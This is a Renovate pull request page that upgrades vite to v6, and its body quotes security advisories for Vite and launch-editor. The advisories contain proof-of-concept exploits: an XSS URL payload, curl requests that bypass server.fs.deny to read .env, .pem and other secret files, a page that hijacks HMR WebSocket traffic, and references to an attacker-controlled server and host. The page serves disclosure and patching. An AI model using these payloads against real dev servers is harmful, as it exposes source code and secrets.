Skip to content

chore(deps): update dependency vite to v6 [security]#33

Open
renovate[bot] wants to merge 1 commit into
mainfrom
renovate/npm-vite-vulnerability
Open

chore(deps): update dependency vite to v6 [security]#33
renovate[bot] wants to merge 1 commit into
mainfrom
renovate/npm-vite-vulnerability

Conversation

@renovate

@renovate renovate Bot commented Sep 25, 2024
edited
Loading

Copy link
Copy Markdown
Contributor

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package Change Age Confidence
vite (source) ^4.4.10^6.0.0 age confidence

Vite XSS vulnerability in server.transformIndexHtml via URL payload

CVE-2023-49293 / GHSA-92r3-m2mg-pj97

More information

Details

Summary

When Vite's HTML transformation is invoked manually via server.transformIndexHtml, the original request URL is passed in unmodified, and the html being transformed contains inline module scripts (<script type="module">...</script>), it is possible to inject arbitrary HTML into the transformed output by supplying a malicious URL query string to server.transformIndexHtml.

Impact

Only apps using appType: 'custom' and using the default Vite HTML middleware are affected. The HTML entry must also contain an inline script. The attack requires a user to click on a malicious URL while running the dev server. Restricted files aren't exposed to the attacker.

Patches

Fixed in vite@5.0.5, vite@4.5.1, vite@4.4.12

Details

Suppose index.html contains an inline module script:

<script type="module">
  // Inline script
</script>

This script is transformed into a proxy script like

<script type="module" src="/index.html?html-proxy&index=0.js"></script>

due to Vite's HTML plugin:

https://github.com/vitejs/vite/blob/7fd7c6cebfcad34ae7021ebee28f97b1f28ef3f3/packages/vite/src/node/plugins/html.ts#L429-L465

When appType: 'spa' | 'mpa', Vite serves HTML itself, and htmlFallbackMiddleware rewrites req.url to the canonical path of index.html,

https://github.com/vitejs/vite/blob/73ef074b80fa7252e0c46a37a2c94ba8cba46504/packages/vite/src/node/server/middlewares/htmlFallback.ts#L44-L47

so the url passed to server.transformIndexHtml is /index.html.

However, if appType: 'custom', HTML is served manually, and if server.transformIndexHtml is called with the unmodified request URL (as the SSR docs suggest), then the path of the transformed html-proxy script varies with the request URL. For example, a request with path / produces

<script type="module" src="/@&#8203;id/__x00__/index.html?html-proxy&index=0.js"></script>

It is possible to abuse this behavior by crafting a request URL to contain a malicious payload like

"></script><script>alert('boom')</script>

so a request to http://localhost:5173/?%22%3E%3C/script%3E%3Cscript%3Ealert(%27boom%27)%3C/script%3E produces HTML output like

<script type="module" src="/@&#8203;id/__x00__/?"></script><script>alert("boom")</script>?html-proxy&index=0.js"></script>

which demonstrates XSS.

PoC
Detailed Impact

This will probably predominantly affect development-mode SSR, where vite.transformHtml is called using the original req.url, per the docs:

https://github.com/vitejs/vite/blob/7fd7c6cebfcad34ae7021ebee28f97b1f28ef3f3/docs/guide/ssr.md?plain=1#L114-L126

However, since this vulnerability affects server.transformIndexHtml, the scope of impact may be higher to also include other ad-hoc calls to server.transformIndexHtml from outside of Vite's own codebase.

My best guess at bisecting which versions are vulnerable involves the following test script

import fs from 'node:fs/promises';
import * as vite from 'vite';

const html = `
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
  </head>
  <body>
    <script type="module">
      // Inline script
    </script>
  </body>
</html>
`;
const server = await vite.createServer({ appType: 'custom' });
const transformed = await server.transformIndexHtml('/?%22%3E%3C/script%3E%3Cscript%3Ealert(%27boom%27)%3C/script%3E', html);
console.log(transformed);
await server.close();

and using it I was able to narrow down to #​13581. If this is correct, then vulnerable Vite versions are 4.4.0-beta.2 and higher (which includes 4.4.0).

Severity

  • CVSS Score: 6.1 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Vite dev server option server.fs.deny can be bypassed when hosted on case-insensitive filesystem

CVE-2024-23331 / GHSA-c24v-8rfc-w8vw

More information

Details

Summary

Vite dev server option server.fs.deny can be bypassed on case-insensitive file systems using case-augmented versions of filenames. Notably this affects servers hosted on Windows.

This bypass is similar to https://nvd.nist.gov/vuln/detail/CVE-2023-34092 -- with surface area reduced to hosts having case-insensitive filesystems.

Patches

Fixed in vite@5.0.12, vite@4.5.2, vite@3.2.8, vite@2.9.17

Details

Since picomatch defaults to case-sensitive glob matching, but the file server doesn't discriminate; a blacklist bypass is possible.

See picomatch usage, where nocase is defaulted to false: https://github.com/vitejs/vite/blob/v5.1.0-beta.1/packages/vite/src/node/server/index.ts#L632

By requesting raw filesystem paths using augmented casing, the matcher derived from config.server.fs.deny fails to block access to sensitive files.

PoC

Setup

  1. Created vanilla Vite project using npm create vite@latest on a Standard Azure hosted Windows 10 instance.
  2. Created dummy secret files, e.g. custom.secret and production.pem
  3. Populated vite.config.js with
export default { server: { fs: { deny: ['.env', '.env.*', '*.{crt,pem}', 'custom.secret'] } } }

Reproduction

  1. curl -s http://20.12.242.81:5173/@&#8203;fs//
    • Descriptive error page reveals absolute filesystem path to project root
  2. curl -s http://20.12.242.81:5173/@&#8203;fs/C:/Users/darbonzo/Desktop/vite-project/vite.config.js
    • Discoverable configuration file reveals locations of secrets
  3. curl -s http://20.12.242.81:5173/@&#8203;fs/C:/Users/darbonzo/Desktop/vite-project/custom.sEcReT
    • Secrets are directly accessible using case-augmented version of filename

Proof
Screenshot 2024-01-19 022736

Impact

Who

  • Users with exposed dev servers on environments with case-insensitive filesystems

What

  • Files protected by server.fs.deny are both discoverable, and accessible

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Vite's server.fs.deny did not deny requests for patterns with directories.

CVE-2024-31207 / GHSA-8jhw-289h-jh2g

More information

Details

Summary

Vite dev server option server.fs.deny did not deny requests for patterns with directories. An example of such a pattern is /foo/**/*.

Impact

Only apps setting a custom server.fs.deny that includes a pattern with directories, and explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected.

Patches

Fixed in vite@5.2.6, vite@5.1.7, vite@5.0.13, vite@4.5.3, vite@3.2.10, vite@2.9.18

Details

server.fs.deny uses picomatch with the config of { matchBase: true }. matchBase only matches the basename of the file, not the path due to a bug (https://github.com/micromatch/picomatch/issues/89). The vite config docs read like you should be able to set fs.deny to glob with picomatch. Vite also does not set { dot: true } and that causes dotfiles not to be denied unless they are explicitly defined.

Reproduction

Set fs.deny to ['**/.git/**'] and then curl for /.git/config.

  • with matchBase: true, you can get any file under .git/ (config, HEAD, etc).
  • with matchBase: false, you cannot get any file under .git/ (config, HEAD, etc).

Severity

  • CVSS Score: 5.9 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Vite's server.fs.deny is bypassed when using ?import&raw

CVE-2024-45811 / GHSA-9cwx-2883-4wfx

More information

Details

Summary

The contents of arbitrary files can be returned to the browser.

Details

@fs denies access to files outside of Vite serving allow list. Adding ?import&raw to the URL bypasses this limitation and returns the file content if it exists.

PoC
$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

##### expected behaviour
$ curl "http://localhost:5173/@&#8203;fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

##### security bypassed
$ curl "http://localhost:5173/@&#8203;fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...

Severity

  • CVSS Score: 6.9 / 10 (Medium)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Vite DOM Clobbering gadget found in vite bundled scripts that leads to XSS

CVE-2024-45812 / GHSA-64vr-g452-qvp3

More information

Details

Summary

We discovered a DOM Clobbering vulnerability in Vite when building scripts to cjs/iife/umd output format. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.

Note that, we have identified similar security issues in Webpack: GHSA-4vvj-4cpr-p986

Details

Backgrounds

DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:

[1] https://scnps.co/papers/sp23_domclob.pdf
[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/

Gadgets found in Vite

We have identified a DOM Clobbering vulnerability in Vite bundled scripts, particularly when the scripts dynamically import other scripts from the assets folder and the developer sets the build output format to cjs, iife, or umd. In such cases, Vite replaces relative paths starting with __VITE_ASSET__ using the URL retrieved from document.currentScript.

However, this implementation is vulnerable to a DOM Clobbering attack. The document.currentScript lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.

const relativeUrlMechanisms = {
  amd: (relativePath) => {
    if (relativePath[0] !== ".") relativePath = "./" + relativePath;
    return getResolveUrl(
      `require.toUrl('${escapeId(relativePath)}'), document.baseURI`
    );
  },
  cjs: (relativePath) => `(typeof document === 'undefined' ? ${getFileUrlFromRelativePath(
    relativePath
  )} : ${getRelativeUrlFromDocument(relativePath)})`,
  es: (relativePath) => getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', import.meta.url`
  ),
  iife: (relativePath) => getRelativeUrlFromDocument(relativePath),
  // NOTE: make sure rollup generate `module` params
  system: (relativePath) => getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', module.meta.url`
  ),
  umd: (relativePath) => `(typeof document === 'undefined' && typeof location === 'undefined' ? ${getFileUrlFromRelativePath(
    relativePath
  )} : ${getRelativeUrlFromDocument(relativePath, true)})`
};
PoC

Considering a website that contains the following main.js script, the devloper decides to use the Vite to bundle up the program with the following configuration.

// main.js
import extraURL from './extra.js?url'
var s = document.createElement('script')
s.src = extraURL
document.head.append(s)

// extra.js
export default "https://myserver/justAnOther.js"

// vite.config.js
import { defineConfig } from 'vite'

export default defineConfig({
  build: {
    assetsInlineLimit: 0, // To avoid inline assets for PoC
    rollupOptions: {
      output: {
        format: "cjs"
      },
    },
  },
  base: "./",
});

After running the build command, the developer will get following bundle as the output.

// dist/index-DDmIg9VD.js
"use strict";const t=""+(typeof document>"u"?require("url").pathToFileURL(__dirname+"/extra-BLVEx9Lb.js").href:new URL("extra-BLVEx9Lb.js",document.currentScript&&document.currentScript.src||document.baseURI).href);var e=document.createElement("script");e.src=t;document.head.append(e);

Adding the Vite bundled script, dist/index-DDmIg9VD.js, as part of the web page source code, the page could load the extra.js file from the attacker's domain, attacker.controlled.server. The attacker only needs to insert an img tag with the name attribute set to currentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.

<!DOCTYPE html>
<html>
<head>
  <title>Vite Example</title>
  <!-- Attacker-controlled Script-less HTML Element starts--!>
  <img name="currentScript" src="https://attacker.controlled.server/"></img>
  <!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script type="module" crossorigin src="/assets/index-DDmIg9VD.js"></script>
<body>
</body>
</html>
Impact

This vulnerability can result in cross-site scripting (XSS) attacks on websites that include Vite-bundled files (configured with an output format of cjs, iife, or umd) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.

Patch
// https://github.com/vitejs/vite/blob/main/packages/vite/src/node/build.ts#L1296
const getRelativeUrlFromDocument = (relativePath: string, umd = false) =>
  getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', ${
      umd ? `typeof document === 'undefined' ? location.href : ` : ''
    }document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`,
  )

Severity

  • CVSS Score: 4.8 / 10 (Medium)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Websites were able to send any requests to the development server and read the response in vite

CVE-2025-24010 / GHSA-vg6x-rcgg-rjx6

More information

Details

Summary

Vite allowed any websites to send any requests to the development server and read the response due to default CORS settings and lack of validation on the Origin header for WebSocket connections.

[!WARNING]
This vulnerability even applies to users that only run the Vite dev server on the local machine and does not expose the dev server to the network.

Upgrade Path

Users that does not match either of the following conditions should be able to upgrade to a newer version of Vite that fixes the vulnerability without any additional configuration.

  • Using the backend integration feature
  • Using a reverse proxy in front of Vite
  • Accessing the development server via a domain other than localhost or *.localhost
  • Using a plugin / framework that connects to the WebSocket server on their own from the browser
Using the backend integration feature

If you are using the backend integration feature and not setting server.origin, you need to add the origin of the backend server to the server.cors.origin option. Make sure to set a specific origin rather than *, otherwise any origin can access your development server.

Using a reverse proxy in front of Vite

If you are using a reverse proxy in front of Vite and sending requests to Vite with a hostname other than localhost or *.localhost, you need to add the hostname to the new server.allowedHosts option. For example, if the reverse proxy is sending requests to http://vite:5173, you need to add vite to the server.allowedHosts option.

Accessing the development server via a domain other than localhost or *.localhost

You need to add the hostname to the new server.allowedHosts option. For example, if you are accessing the development server via http://foo.example.com:8080, you need to add foo.example.com to the server.allowedHosts option.

Using a plugin / framework that connects to the WebSocket server on their own from the browser

If you are using a plugin / framework, try upgrading to a newer version of Vite that fixes the vulnerability. If the WebSocket connection appears not to be working, the plugin / framework may have a code that connects to the WebSocket server on their own from the browser.

In that case, you can either:

  • fix the plugin / framework code to the make it compatible with the new version of Vite
  • set legacy.skipWebSocketTokenCheck: true to opt-out the fix for [2] while the plugin / framework is incompatible with the new version of Vite
    • When enabling this option, make sure that you are aware of the security implications described in the impact section of [2] above.
Mitigation without upgrading Vite
[1]: Permissive default CORS settings

Set server.cors to false or limit server.cors.origin to trusted origins.

[2]: Lack of validation on the Origin header for WebSocket connections

There aren't any mitigations for this.

[3]: Lack of validation on the Host header for HTTP requests

Use Chrome 94+ or use HTTPS for the development server.

Details

There are three causes that allowed malicious websites to send any requests to the development server:

[1]: Permissive default CORS settings

Vite sets the Access-Control-Allow-Origin header depending on server.cors option. The default value was true which sets Access-Control-Allow-Origin: *. This allows websites on any origin to fetch contents served on the development server.

Attack scenario:

  1. The attacker serves a malicious web page (http://malicious.example.com).
  2. The user accesses the malicious web page.
  3. The attacker sends a fetch('http://127.0.0.1:5173/main.js') request by JS in that malicious web page. This request is normally blocked by same-origin policy, but that's not the case for the reasons above.
  4. The attacker gets the content of http://127.0.0.1:5173/main.js.
[2]: Lack of validation on the Origin header for WebSocket connections

Vite starts a WebSocket server to handle HMR and other functionalities. This WebSocket server did not perform validation on the Origin header and was vulnerable to Cross-Site WebSocket Hijacking (CSWSH) attacks. With that attack, an attacker can read and write messages on the WebSocket connection. Vite only sends some information over the WebSocket connection (list of the file paths that changed, the file content where the errored happened, etc.), but plugins can send arbitrary messages and may include more sensitive information.

Attack scenario:

  1. The attacker serves a malicious web page (http://malicious.example.com).
  2. The user accesses the malicious web page.
  3. The attacker runs new WebSocket('http://127.0.0.1:5173', 'vite-hmr') by JS in that malicious web page.
  4. The user edits some files.
  5. Vite sends some HMR messages over WebSocket.
  6. The attacker gets the content of the HMR messages.
[3]: Lack of validation on the Host header for HTTP requests

Unless server.https is set, Vite starts the development server on HTTP. Non-HTTPS servers are vulnerable to DNS rebinding attacks without validation on the Host header. But Vite did not perform validation on the Host header. By exploiting this vulnerability, an attacker can send arbitrary requests to the development server bypassing the same-origin policy.

  1. The attacker serves a malicious web page that is served on HTTP (http://malicious.example.com:5173) (HTTPS won't work).
  2. The user accesses the malicious web page.
  3. The attacker changes the DNS to point to 127.0.0.1 (or other private addresses).
  4. The attacker sends a fetch('/main.js') request by JS in that malicious web page.
  5. The attacker gets the content of http://127.0.0.1:5173/main.js bypassing the same origin policy.
Impact
[1]: Permissive default CORS settings

Users with the default server.cors option may:

  • get the source code stolen by malicious websites
  • give the attacker access to functionalities that are not supposed to be exposed externally
    • Vite core does not have any functionality that causes changes somewhere else when receiving a request, but plugins may implement those functionalities and servers behind server.proxy may have those functionalities.
[2]: Lack of validation on the Origin header for WebSocket connections

All users may get the file paths of the files that changed and the file content where the error happened be stolen by malicious websites.

For users that is using a plugin that sends messages over WebSocket, that content may be stolen by malicious websites.

For users that is using a plugin that has a functionality that is triggered by messages over WebSocket, that functionality may be exploited by malicious websites.

[3]: Lack of validation on the Host header for HTTP requests

Users using HTTP for the development server and using a browser that is not Chrome 94+ may:

  • get the source code stolen by malicious websites
  • give the attacker access to functionalities that are not supposed to be exposed externally
    • Vite core does not have any functionality that causes changes somewhere else when receiving a request, but plugins may implement those functionalities and servers behind server.proxy may have those functionalities.

Chrome 94+ users are not affected for [3], because sending a request to a private network page from public non-HTTPS page is forbidden since Chrome 94.

Related Information

Safari has a bug that blocks requests to loopback addresses from HTTPS origins. This means when the user is using Safari and Vite is listening on lookback addresses, there's another condition of "the malicious web page is served on HTTP" to make [1] and [2] to work.

PoC
[2]: Lack of validation on the Origin header for WebSocket connections
  1. I used the react template which utilizes HMR functionality.
npm create vite@latest my-vue-app-react -- --template react
  1. Then on a malicious server, serve the following POC html:
<!doctype html>
<html lang="en">
    <head>
        <meta charset="utf-8" />
        <title>vite CSWSH</title>
    </head>
    <body>
        <div id="logs"></div>
        <script>
            const div = document.querySelectorAll('#logs')[0];
            const ws = new WebSocket('ws://localhost:5173','vite-hmr');
            ws.onmessage = event => {
                const logLine = document.createElement('p');
                logLine.innerHTML = event.data;
                div.append(logLine);
            };
        </script>
    </body>
</html>
  1. Kick off Vite
npm run dev
  1. Load the development server (open http://localhost:5173/) as well as the malicious page in the browser.
  2. Edit src/App.jsx file and intentionally place a syntax error
  3. Notice how the malicious page can view the websocket messages and a snippet of the source code is exposed

Here's a video demonstrating the POC:

vite-cswsh.mov

Severity

  • CVSS Score: 6.5 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Vite middleware may serve files starting with the same name with the public directory

CVE-2025-58751 / GHSA-g4jq-h2w9-997c

More information

Details

Summary

Files starting with the same name with the public directory were served bypassing the server.fs settings.

Impact

Only apps that match the following conditions are affected:

Details

The servePublicMiddleware function is in charge of serving public files from the server. It returns the viteServePublicMiddleware function which runs the needed tests and serves the page. The viteServePublicMiddleware function checks if the publicFiles variable is defined, and then uses it to determine if the requested page is public. In the case that the publicFiles is undefined, the code will treat the requested page as a public page, and go on with the serving function. publicFiles may be undefined if there is a symbolic link anywhere inside the public directory. In that case, every requested page will be passed to the public serving function. The serving function is based on the sirv library. Vite patches the library to add the possibility to test loading access to pages, but when the public page middleware disables this functionality since public pages are meant to be available always, regardless of whether they are in the allow or deny list.

In the case of public pages, the serving function is provided with the path to the public directory as a root directory. The code of the sirv library uses the join function to get the full path to the requested file. For example, if the public directory is "/www/public", and the requested file is "myfile", the code will join them to the string "/www/public/myfile". The code will then pass this string to the normalize function. Afterwards, the code will use the string's startsWith function to determine whether the created path is within the given directory or not. Only if it is, it will be served.

Since sirv trims the trailing slash of the public directory, the string's startsWith function may return true even if the created path is not within the public directory. For example, if the server's root is at "/www", and the public directory is at "/www/p", if the created path will be "/www/private.txt", the startsWith function will still return true, because the string "/www/private.txt" starts with  "/www/p". To achieve this, the attacker will use ".." to ask for the file "../private.txt". The code will then join it to the "/www/p" string, and will receive "/www/p/../private.txt". Then, the normalize function will return "/www/private.txt", which will then be passed to the startsWith function, which will return true, and the processing of the page will continue without checking the deny list (since this is the public directory middleware which doesn't check that).

PoC

Execute the following shell commands:

npm  create  vite@latest
cd vite-project/
mkdir p
cd p
ln -s a b
cd ..
echo  'import path from "node:path"; import { defineConfig } from "vite"; export default defineConfig({publicDir: path.resolve(__dirname, "p/"), server: {fs: {deny: [path.resolve(__dirname, "private.txt")]}}})' > vite.config.js
echo  "secret" > private.txt
npm install
npm run dev

Then, in a different shell, run the following command:

curl -v --path-as-is 'http://localhost:5173/private.txt'

You will receive a 403 HTTP Response,  because private.txt is denied.

Now in the same shell run the following command:

curl -v --path-as-is 'http://localhost:5173/../private.txt'

You will receive the contents of private.txt.

Related links

Severity

  • CVSS Score: 2.3 / 10 (Low)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Vite's server.fs settings were not applied to HTML files

CVE-2025-58752 / GHSA-jqfw-vq24-v9c3

More information

Details

Summary

Any HTML files on the machine were served regardless of the server.fs settings.

Impact

Only apps that match the following conditions are affected:

  • explicitly exposes the Vite dev server to the network (using --host or server.host config option)
  • appType: 'spa' (default) or appType: 'mpa' is used

This vulnerability also affects the preview server. The preview server allowed HTML files not under the output directory to be served.

Details

The serveStaticMiddleware function is in charge of serving static files from the server. It returns the viteServeStaticMiddleware function which runs the needed tests and serves the page. The viteServeStaticMiddleware function checks if the extension of the requested file is ".html". If so, it doesn't serve the page. Instead, the server will go on to the next middlewares, in this case htmlFallbackMiddleware, and then to indexHtmlMiddleware. These middlewares don't perform any test against allow or deny rules, and they don't make sure that the accessed file is in the root directory of the server. They just find the file and send back its contents to the client.

PoC

Execute the following shell commands:

npm  create  vite@latest
cd vite-project/
echo  "secret" > /tmp/secret.html
npm install
npm run dev

Then, in a different shell, run the following command:

curl -v --path-as-is 'http://localhost:5173/../../../../../../../../../../../tmp/secret.html'

The contents of /tmp/secret.html will be returned.

This will also work for HTML files that are in the root directory of the project, but are in the deny list (or not in the allow list). Test that by stopping the running server (CTRL+C), and running the following commands in the server's shell:

echo  'import path from "node:path"; import { defineConfig } from "vite"; export default defineConfig({server: {fs: {deny: [path.resolve(__dirname, "secret_files/*")]}}})'  >  [vite.config.js](http://vite.config.js)
mkdir secret_files
echo "secret txt" > secret_files/secret.txt
echo "secret html" > secret_files/secret.html
npm run dev

Then, in a different shell, run the following command:

curl -v --path-as-is 'http://localhost:5173/secret_files/secret.txt'

You will receive a 403 HTTP Response,  because everything in the secret_files directory is denied.

Now in the same shell run the following command:

curl -v --path-as-is 'http://localhost:5173/secret_files/secret.html'

You will receive the contents of secret_files/secret.html.

Severity

  • CVSS Score: 2.3 / 10 (Low)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Vite Vulnerable to Path Traversal in Optimized Deps .map Handling

CVE-2026-39365 / GHSA-4w7w-66w2-5vf9

More information

Details

Summary

Any files ending with .map even out side the project can be returned to the browser.

Impact

Only apps that match the following conditions are affected:

  • explicitly exposes the Vite dev server to the network (using --host or server.host config option)
  • have a sensitive content in files ending with .map and the path is predictable
Details

In Vite v7.3.1, the dev server’s handling of .map requests for optimized dependencies resolves file paths and calls readFile without restricting ../ segments in the URL. As a result, it is possible to bypass the server.fs.strict allow list and retrieve .map files located outside the project root, provided they can be parsed as valid source map JSON.

PoC
  1. Create a minimal PoC sourcemap outside the project root 
    cat > /tmp/poc.map <<'EOF'
{"version":3,"file":"x.js","sources":[],"names":[],"mappings":""}
EOF
  2. Start the Vite dev server (example) 
    pnpm -C playground/fs-serve dev --host 127.0.0.1 --port 18080
  3. Confirm that direct /@&#8203;fs access is blocked by strict (returns 403)
    image
  4. Inject ../ segments under the optimized deps .map URL prefix to reach /tmp/poc.map
    image

Severity

  • CVSS Score: 6.3 / 10 (Medium)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

launch-editor vulnerable to command injection via the crafted request on Windows

CVE-2024-52011 / GHSA-c27g-q93r-2cwf

More information

Details

Summary

Due to the insufficient sanitization of the file argument in the launchEditor, an attacker can execute arbitrary commands on Windows by supplying a filename that contains special characters.

Impact

If the following conditions are met, an attacker can execute arbitrary commands on the computer that is using the launch-editor:

  • An attacker can place a file with the malicious filename
  • An attacker can call the launchEditor method with the file argument controlled
  • The launch-editor package is running on Windows

For example, some development server using this package satisfy these conditions, as a malicious website might be able to force the downloading of a file and the path of that file is predictable.

Patch

This issue has been fixed in the launch-editor version 2.9.0 (commit).

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

vite: server.fs.deny bypass on Windows alternate paths

CVE-2026-53571 / GHSA-fx2h-pf6j-xcff

More information

Details

Summary

The contents of files that are specified by server.fs.deny can be returned to the browser on Windows.

Impact

Only apps that match the following conditions are affected:

  • explicitly exposes the Vite dev server to the network (using --host or server.host config option)
  • the sensitive file exists in the allowed directories specified by server.fs.allow
  • either of:
    • the sensitive file exists in an NTFS volume
    • the dev server is running on Windows and the sensitive file exists in a volume that 8.3 short name generation is enabled (it is enabled by default on system volumes)
Details

Vite’s dev server denies direct access to sensitive files through server.fs.deny, including entries such as .env, .env.*, and *.{crt,pem}. However, on Windows, the deny logic does not correctly normalize NTFS ADS path forms before access checks are applied.
Because of this, requests such as /.env::$DATA?raw are treated as allowed paths, while Windows resolves them to the original file's default data stream.

Similar to that, Windows allows accessing a file using a different name with the 8.3 short name compatibility feature. Vite did not reject accessing files via them.

PoC
$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

Access via browser at http://localhost:5173/.env::$DATA?raw
deecc1315123883cfd0f9c26a002845a

Example expected result:

  • /.env::$DATA?raw returns the contents of .env
  • /tls.pem::$DATA?raw returns the contents of tls.pem

Severity

  • CVSS Score: 8.2 / 10 (High)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

launch-editor: NTLMv2 hash disclosure via UNC path handling on Windows

CVE-2026-53632 / GHSA-v6wh-96g9-6wx3

More information

Details

Summary

The launch-editor NPM package accesses arbitrary paths including Windows UNC paths. When a UNC path is opened, Windows automatically attempts NTLM authentication to the remote host, causing the user’s NTLMv2 password hash to be leaked to an attacker-controlled SMB server. This can result in credential compromise through offline hash cracking.

Impact

If the following conditions are met, an attacker can get the NTLMv2 password hash on the computer that is using the launch-editor:

  • using Windows
  • NTLM is not disabled (it is recommended to disable, while it's still enabled by default)
  • the user accesses the attackers website that sends request to a middleware using launch-editor
  • the server that has the middleware using launch-editor is running
  • the attacker knows the URL for that server and the middleware

This would be a problem if the user password is too simple that it can be identified through offline hash cracking, potentially leading to further compromise of developer accounts or internal systems.

Details

launch-editor accepts file paths without validating or restricting Windows UNC paths such as:

\\attacker-host\share

On Windows systems, accessing a UNC path triggers an automatic NTLM authentication attempt

Note

PR body was truncated to here.

@github-actions

github-actions Bot commented Sep 25, 2024
edited
Loading

Copy link
Copy Markdown

Coverage Report

Status Category Percentage Covered / Total
🔵 Lines 95.78% 432 / 451
🔵 Statements 95.78% 432 / 451
🔵 Functions 93.75% 30 / 32
🔵 Branches 93.63% 147 / 157
File CoverageNo changed files found.
Generated in workflow #1015 for commit 153124e by the Vitest Coverage Report Action

@renovate renovate Bot changed the title chore(deps): update dependency vite to v4.5.5 [security] chore(deps): update dependency vite to v4.5.5 [security] - autoclosed Sep 25, 2024
@renovate renovate Bot closed this Sep 25, 2024
@renovate renovate Bot deleted the renovate/npm-vite-vulnerability branch September 25, 2024 19:27
@renovate renovate Bot restored the renovate/npm-vite-vulnerability branch September 26, 2024 19:34
@renovate renovate Bot changed the title chore(deps): update dependency vite to v4.5.5 [security] - autoclosed chore(deps): update dependency vite to v4.5.5 [security] Sep 26, 2024
@renovate renovate Bot reopened this Sep 26, 2024
@renovate renovate Bot force-pushed the renovate/npm-vite-vulnerability branch from 3a705c1 to 50bcba6 Compare September 26, 2024 19:35
@renovate renovate Bot force-pushed the renovate/npm-vite-vulnerability branch from 50bcba6 to 8597b36 Compare January 22, 2025 02:28
@renovate renovate Bot changed the title chore(deps): update dependency vite to v4.5.5 [security] chore(deps): update dependency vite to v4.5.6 [security] Jan 22, 2025
@renovate renovate Bot force-pushed the renovate/npm-vite-vulnerability branch from 8597b36 to b3968a6 Compare March 3, 2025 13:43
@renovate renovate Bot force-pushed the renovate/npm-vite-vulnerability branch 2 times, most recently from 24c2544 to b872a6b Compare March 17, 2025 13:54
@renovate renovate Bot force-pushed the renovate/npm-vite-vulnerability branch from b872a6b to 78cfe0d Compare April 1, 2025 08:24
@renovate renovate Bot force-pushed the renovate/npm-vite-vulnerability branch from 78cfe0d to 06d8b1e Compare June 4, 2025 08:45
@renovate renovate Bot force-pushed the renovate/npm-vite-vulnerability branch from 06d8b1e to 9a9c36f Compare June 22, 2025 11:45
@renovate renovate Bot force-pushed the renovate/npm-vite-vulnerability branch from 9a9c36f to 6c0b34e Compare September 10, 2025 19:05
@renovate renovate Bot changed the title chore(deps): update dependency vite to v4.5.6 [security] chore(deps): update dependency vite to v5 [security] Sep 10, 2025
@renovate renovate Bot force-pushed the renovate/npm-vite-vulnerability branch from 6c0b34e to b844c31 Compare September 25, 2025 17:28
@renovate renovate Bot force-pushed the renovate/npm-vite-vulnerability branch from b844c31 to f8efa7a Compare October 21, 2025 18:38
